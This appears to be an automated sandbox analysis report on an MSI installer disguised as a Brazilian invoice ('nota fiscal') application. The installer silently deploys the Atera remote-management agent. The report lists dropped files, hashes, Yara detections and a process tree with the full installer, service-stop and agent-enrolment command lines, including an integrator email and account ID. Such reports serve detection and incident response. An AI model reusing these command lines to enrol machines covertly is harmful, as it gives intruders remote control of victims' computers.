                                                                                                                                                                                                                                                                                              Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                              C:\Windows\Temp\~DFDAABEC74117CC1C6.TMP

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                              File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):20480
                                                                                                                                                                                                                                                                                              Entropy (8bit):1.5701520453577955
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:48:sp8PhluRc06WXJsFT5SFgWbkqISoedGPdGfoOdrzST1StedGPdGRub1n:skhl1PFTlchI4QT1ox
                                                                                                                                                                                                                                                                                              MD5:E4BF5E06B9C0886D6CBFC3D68E095B0E
                                                                                                                                                                                                                                                                                              SHA1:7437D28CE9985FC0554FDFF9F991BDD1AD5C5BBA
                                                                                                                                                                                                                                                                                              SHA-256:0F5C40FDF1AEF16B0EC5FC509BB7567705A855ADFB45EAB045B649DD6242A38A
                                                                                                                                                                                                                                                                                              SHA-512:5E9F5B4701A1174A020BB6CB8D653DA54E63E4B474B074A691CC726AD1C4F8B6E296640F4CD9CE6E51CD48E4F83EDA499C1F8B1B9106F5563438F8E35C1D106F
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Yara Hits:
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Windows\Temp\~DFDAABEC74117CC1C6.TMP, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Windows\Temp\~DFDAABEC74117CC1C6.TMP, Author: Joe Security
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                              C:\Windows\Temp\~DFDE18ED566B9C51CF.TMP

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):512
                                                                                                                                                                                                                                                                                              Entropy (8bit):0.0
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:3::
                                                                                                                                                                                                                                                                                              MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                                                                                                                                                                                                              SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                                                                                                                                                                                                              SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                                                                                                                                                                                                              SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                              C:\Windows\Temp\~DFE507A9E0C295E778.TMP

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                              File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):20480
                                                                                                                                                                                                                                                                                              Entropy (8bit):1.6207987421976968
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:48:W8PhPuRc06WXJEFT5uDKqISoedvPdvbCnuhnq9Onq9BGdStedvPdvxubS:phP1HFTQDvIciuBuOV4
                                                                                                                                                                                                                                                                                              MD5:6C9F273A8707FD4E195FF4F2D79178E2
                                                                                                                                                                                                                                                                                              SHA1:2D675F7C4F6C99B84F9E9AC474E2772E03EA733E
                                                                                                                                                                                                                                                                                              SHA-256:F94292120E245269A40A88370601D3277F4B63CC8650FEE6BE014288291F108E
                                                                                                                                                                                                                                                                                              SHA-512:3CF295A01EEC2777ECA7F1D7F282DF1D65B76EBA48F696E452FFB4302805B069A9D2C6CDAA1249ECC970561C94690418B932C6EE5154D1078D8343DFD2C15A97
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Yara Hits:
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Windows\Temp\~DFE507A9E0C295E778.TMP, Author: Joe Security
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                              C:\Windows\Temp\~DFE82B32FCCAC083A6.TMP

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):512
                                                                                                                                                                                                                                                                                              Entropy (8bit):0.0
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:3::
                                                                                                                                                                                                                                                                                              MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                                                                                                                                                                                                              SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                                                                                                                                                                                                              SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                                                                                                                                                                                                              SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                              C:\Windows\Temp\~DFEE64D0168B710AC4.TMP

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                              File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):32768
                                                                                                                                                                                                                                                                                              Entropy (8bit):1.2309993325116284
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:48:3VUuKNveFXJ5T5CDyqISoedGPdGTWaStedGPdGTn:lU8hTkDHIOD
                                                                                                                                                                                                                                                                                              MD5:FCF8BEAA29D6285CFF2000F44F4B5972
                                                                                                                                                                                                                                                                                              SHA1:E80DDE73FF4C29E48F5AF474C1479F4C0AD9346D
                                                                                                                                                                                                                                                                                              SHA-256:81E2E2373C75874284C496257AFDEDE5F9FFD13077B1BA8181110017F962093C
                                                                                                                                                                                                                                                                                              SHA-512:DCF47F5317C3EF5536F31770F2A769157F01190CD30C776C372A6CE8DE13917AE782AB42E681DF3716E3136790B0C33D6E204ECFA2B855530366DB0C5CBF5B4A
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Yara Hits:
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Windows\Temp\~DFEE64D0168B710AC4.TMP, Author: Joe Security
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                              C:\Windows\Temp\~DFF490C3560564DA83.TMP

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                              File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):20480
                                                                                                                                                                                                                                                                                              Entropy (8bit):1.6207987421976968
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:48:W8PhPuRc06WXJEFT5uDKqISoedvPdvbCnuhnq9Onq9BGdStedvPdvxubS:phP1HFTQDvIciuBuOV4
                                                                                                                                                                                                                                                                                              MD5:6C9F273A8707FD4E195FF4F2D79178E2
                                                                                                                                                                                                                                                                                              SHA1:2D675F7C4F6C99B84F9E9AC474E2772E03EA733E
                                                                                                                                                                                                                                                                                              SHA-256:F94292120E245269A40A88370601D3277F4B63CC8650FEE6BE014288291F108E
                                                                                                                                                                                                                                                                                              SHA-512:3CF295A01EEC2777ECA7F1D7F282DF1D65B76EBA48F696E452FFB4302805B069A9D2C6CDAA1249ECC970561C94690418B932C6EE5154D1078D8343DFD2C15A97
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Yara Hits:
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Windows\Temp\~DFF490C3560564DA83.TMP, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Windows\Temp\~DFF490C3560564DA83.TMP, Author: Joe Security
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                              \Device\ConDrv

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe
                                                                                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):4019
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.255342738012416
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:48:8gDOYIg8OPgFOM3gYgOVOhVWgBNNXzHSxBNN4zPzRlXNzSPeZgg9dSjedcdS4dSC:Vb4oH8afhbZh9A6qA4AAADjAN
                                                                                                                                                                                                                                                                                              MD5:8194759065D93E08EF8CB2774B204096
                                                                                                                                                                                                                                                                                              SHA1:8470603A95C936FF195596ECC586987F7CA38EC7
                                                                                                                                                                                                                                                                                              SHA-256:260647229E0A266CEE9DFC32FFA136D007677A8379CE50C3B6BF32CE6A47E1FF
                                                                                                                                                                                                                                                                                              SHA-512:5304FB8B48FF944AD7F44470FC8C1E74AB44B6CA3E85160F30B92F3C8CD5D0515A26AAF9D5D4071DAD1CF5FD50F9E8754341D9C453ACAEDFCF91521B3A4AF6CD
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Yara Hits:
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: \Device\ConDrv, Author: Joe Security
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:2025-01-06 06:59:26.7350|ERROR|WindowsWindowedEventLogProvider|Error on retry number 1: Could not find file 'C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\LastWindowedEventsProcessed.json'...2025-01-06 06:59:27.8600|ERROR|WindowsWindowedEventLogProvider|Error on retry number 2: Could not find file 'C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\LastWindowedEventsProcessed.json'...2025-01-06 06:59:29.9225|ERROR|WindowsWindowedEventLogProvider|Error on retry number 3: Could not find file 'C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\LastWindowedEventsProcessed.json'...2025-01-06 06:59:32.9538|ERROR|WindowsWindowedEventLogProvider|Error initializing last processed events, ignoring file, exception: System.IO.FileNotFoundException: Could not find file 'C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\LastWindowedEventsProcessed.json'...File name: 'C:\Progr

                                                                                                                                                                                                                                                                                              Static File Info

                                                                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                                                                              File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, MSI Installer, Code page: 1252, Title: Installation Database, Subject: AteraAgent, Author: Atera networks, Keywords: Installer, Comments: This installer database contains the logic and data required to install AteraAgent., Template: Intel;1033, Revision Number: {721AD955-79FD-4019-BBF5-9DCC4C1175BB}, Create Time/Date: Wed Feb 28 10:52:02 2024, Last Saved Time/Date: Wed Feb 28 10:52:02 2024, Number of Pages: 200, Number of Words: 6, Name of Creating Application: Windows Installer XML Toolset (3.11.2.4516), Security: 2
                                                                                                                                                                                                                                                                                              Entropy (8bit):7.878673655295741
                                                                                                                                                                                                                                                                                              TrID:
                                                                                                                                                                                                                                                                                              • Microsoft Windows Installer (60509/1) 57.88%
                                                                                                                                                                                                                                                                                              • ClickyMouse macro set (36024/1) 34.46%
                                                                                                                                                                                                                                                                                              • Generic OLE2 / Multistream Compound File (8008/1) 7.66%
                                                                                                                                                                                                                                                                                              File name:APLICATIVO-WINDOWS-NOTA-FISCAL.msi
                                                                                                                                                                                                                                                                                              File size:2'994'176 bytes
                                                                                                                                                                                                                                                                                              MD5:7ce6669643890d209540d68e76c0cfcc
                                                                                                                                                                                                                                                                                              SHA1:c49df2e823d5e2461a11c96ad4d36974c7fffc9a
                                                                                                                                                                                                                                                                                              SHA256:27f1cdf3422c4c87d9d273a62df4404339119e416d16d8512479d87acd07c12b
                                                                                                                                                                                                                                                                                              SHA512:dfb7cde9198fe29e9b8738ab2ddca34db87c3be6d9eb1c68e507ffb59f4f9e66761ab84a1e40b4fa040aa061f214c2e2ea1efcfc875bcca44bdf947639ef10ed
                                                                                                                                                                                                                                                                                              SSDEEP:49152:a+1Ypn4N2MGVv1zyIBWGppT9jnMHRjOOozjcqZJN8dUZTwYaH7oqPxMbY+K/tzQz:a+lUlz9FKbsodq0YaH7ZPxMb8tT
                                                                                                                                                                                                                                                                                              TLSH:CFD523117584483AE37B0A358D7ADAA05E7DFE605B70CA8E9308741E2D705C1AB76FB3
                                                                                                                                                                                                                                                                                              File Content Preview:........................>......................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                              File Icon

                                                                                                                                                                                                                                                                                              Icon Hash:2d2e3797b32b2b99

                                                                                                                                                                                                                                                                                              Network Behavior

                                                                                                                                                                                                                                                                                              Skipped network analysis since the amount of network traffic is too extensive. Please download the PCAP and check manually.

                                                                                                                                                                                                                                                                                              Statistics

                                                                                                                                                                                                                                                                                              CPU Usage

                                                                                                                                                                                                                                                                                              Click to jump to process

                                                                                                                                                                                                                                                                                              Memory Usage

                                                                                                                                                                                                                                                                                              Click to jump to process

                                                                                                                                                                                                                                                                                              High Level Behavior Distribution

                                                                                                                                                                                                                                                                                              Click to dive into process behavior distribution

                                                                                                                                                                                                                                                                                              Behavior

                                                                                                                                                                                                                                                                                              Click to jump to process

                                                                                                                                                                                                                                                                                              System Behavior

                                                                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                                                                              Target ID:0
                                                                                                                                                                                                                                                                                              Start time:06:57:58
                                                                                                                                                                                                                                                                                              Start date:06/01/2025
                                                                                                                                                                                                                                                                                              Path:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                              Commandline:"C:\Windows\System32\msiexec.exe" /i "C:\Users\user\Desktop\APLICATIVO-WINDOWS-NOTA-FISCAL.msi"
                                                                                                                                                                                                                                                                                              Imagebase:0x7ff7da920000
                                                                                                                                                                                                                                                                                              File size:69'632 bytes
                                                                                                                                                                                                                                                                                              MD5 hash:E5DA170027542E25EDE42FC54C929077
                                                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                                                                              Target ID:1
                                                                                                                                                                                                                                                                                              Start time:06:57:58
                                                                                                                                                                                                                                                                                              Start date:06/01/2025
                                                                                                                                                                                                                                                                                              Path:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\msiexec.exe /V
                                                                                                                                                                                                                                                                                              Imagebase:0x7ff7da920000
                                                                                                                                                                                                                                                                                              File size:69'632 bytes
                                                                                                                                                                                                                                                                                              MD5 hash:E5DA170027542E25EDE42FC54C929077
                                                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                                                                                                                              Has exited:false

                                                                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                                                                              Target ID:2
                                                                                                                                                                                                                                                                                              Start time:06:57:58
                                                                                                                                                                                                                                                                                              Start date:06/01/2025
                                                                                                                                                                                                                                                                                              Path:C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                              Commandline:C:\Windows\syswow64\MsiExec.exe -Embedding BF843BCBC9EBED5C34216282DB92822D
                                                                                                                                                                                                                                                                                              Imagebase:0x2b0000
                                                                                                                                                                                                                                                                                              File size:59'904 bytes
                                                                                                                                                                                                                                                                                              MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                                                                              Target ID:3
                                                                                                                                                                                                                                                                                              Start time:06:57:59
                                                                                                                                                                                                                                                                                              Start date:06/01/2025
                                                                                                                                                                                                                                                                                              Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                              Commandline:rundll32.exe "C:\Windows\Installer\MSI2D79.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_6893046 2 AlphaControlAgentInstallation!AlphaControlAgentInstallation.CustomActions.GenerateAgentId
                                                                                                                                                                                                                                                                                              Imagebase:0x880000
                                                                                                                                                                                                                                                                                              File size:61'440 bytes
                                                                                                                                                                                                                                                                                              MD5 hash:889B99C52A60DD49227C5E485A016679
                                                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                              Yara matches:
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000003.00000003.1660899653.0000000004990000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                                                                              Target ID:4
                                                                                                                                                                                                                                                                                              Start time:06:57:59
                                                                                                                                                                                                                                                                                              Start date:06/01/2025
                                                                                                                                                                                                                                                                                              Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                              Commandline:rundll32.exe "C:\Windows\Installer\MSI2FBD.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_6893546 6 AlphaControlAgentInstallation!AlphaControlAgentInstallation.CustomActions.ReportMsiStart
                                                                                                                                                                                                                                                                                              Imagebase:0x880000
                                                                                                                                                                                                                                                                                              File size:61'440 bytes
                                                                                                                                                                                                                                                                                              MD5 hash:889B99C52A60DD49227C5E485A016679
                                                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                              Yara matches:
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000004.00000003.1667017550.0000000004A44000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000004.00000002.1702577102.0000000004C01000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000004.00000002.1702577102.0000000004CA4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                                                                              Target ID:5
                                                                                                                                                                                                                                                                                              Start time:06:58:03
                                                                                                                                                                                                                                                                                              Start date:06/01/2025
                                                                                                                                                                                                                                                                                              Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                              Commandline:rundll32.exe "C:\Windows\Installer\MSI3FBB.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_6897625 10 AlphaControlAgentInstallation!AlphaControlAgentInstallation.CustomActions.ShouldContinueInstallation
                                                                                                                                                                                                                                                                                              Imagebase:0x880000
                                                                                                                                                                                                                                                                                              File size:61'440 bytes
                                                                                                                                                                                                                                                                                              MD5 hash:889B99C52A60DD49227C5E485A016679
                                                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                              Yara matches:
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000005.00000003.1706214098.000000000474F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                                                                              Target ID:6
                                                                                                                                                                                                                                                                                              Start time:06:58:04
                                                                                                                                                                                                                                                                                              Start date:06/01/2025
                                                                                                                                                                                                                                                                                              Path:C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                              Commandline:C:\Windows\syswow64\MsiExec.exe -Embedding 3A3D5EBA34EB9624AE48E4F4D08FECDB E Global\MSI0000
                                                                                                                                                                                                                                                                                              Imagebase:0x2b0000
                                                                                                                                                                                                                                                                                              File size:59'904 bytes
                                                                                                                                                                                                                                                                                              MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                                                                              Target ID:7
                                                                                                                                                                                                                                                                                              Start time:06:58:04
                                                                                                                                                                                                                                                                                              Start date:06/01/2025
                                                                                                                                                                                                                                                                                              Path:C:\Windows\SysWOW64\net.exe
                                                                                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                              Commandline:"NET" STOP AteraAgent
                                                                                                                                                                                                                                                                                              Imagebase:0x1d0000
                                                                                                                                                                                                                                                                                              File size:47'104 bytes
                                                                                                                                                                                                                                                                                              MD5 hash:31890A7DE89936F922D44D677F681A7F
                                                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                                                                              Target ID:8
                                                                                                                                                                                                                                                                                              Start time:06:58:04
                                                                                                                                                                                                                                                                                              Start date:06/01/2025
                                                                                                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                                              Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                                                                              Target ID:9
                                                                                                                                                                                                                                                                                              Start time:06:58:04
                                                                                                                                                                                                                                                                                              Start date:06/01/2025
                                                                                                                                                                                                                                                                                              Path:C:\Windows\SysWOW64\net1.exe
                                                                                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\net1 STOP AteraAgent
                                                                                                                                                                                                                                                                                              Imagebase:0xcd0000
                                                                                                                                                                                                                                                                                              File size:139'776 bytes
                                                                                                                                                                                                                                                                                              MD5 hash:2EFE6ED4C294AB8A39EB59C80813FEC1
                                                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                                                                              Target ID:10
                                                                                                                                                                                                                                                                                              Start time:06:58:04
                                                                                                                                                                                                                                                                                              Start date:06/01/2025
                                                                                                                                                                                                                                                                                              Path:C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                              Commandline:"TaskKill.exe" /f /im AteraAgent.exe
                                                                                                                                                                                                                                                                                              Imagebase:0xf40000
                                                                                                                                                                                                                                                                                              File size:74'240 bytes
                                                                                                                                                                                                                                                                                              MD5 hash:CA313FD7E6C2A778FFD21CFB5C1C56CD
                                                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                                                                              Target ID:11
                                                                                                                                                                                                                                                                                              Start time:06:58:04
                                                                                                                                                                                                                                                                                              Start date:06/01/2025
                                                                                                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                                              Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                                                                              Target ID:12
                                                                                                                                                                                                                                                                                              Start time:06:58:04
                                                                                                                                                                                                                                                                                              Start date:06/01/2025
                                                                                                                                                                                                                                                                                              Path:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                              Commandline:"C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe" /i /IntegratorLogin="contato@fazendadoscordeiros.com.br" /CompanyId="1" /IntegratorLoginUI="" /CompanyIdUI="" /FolderId="" /AccountId="001Q300000P2oAPIAZ" /AgentId="52187e48-563c-468d-9785-3542f81fb412"
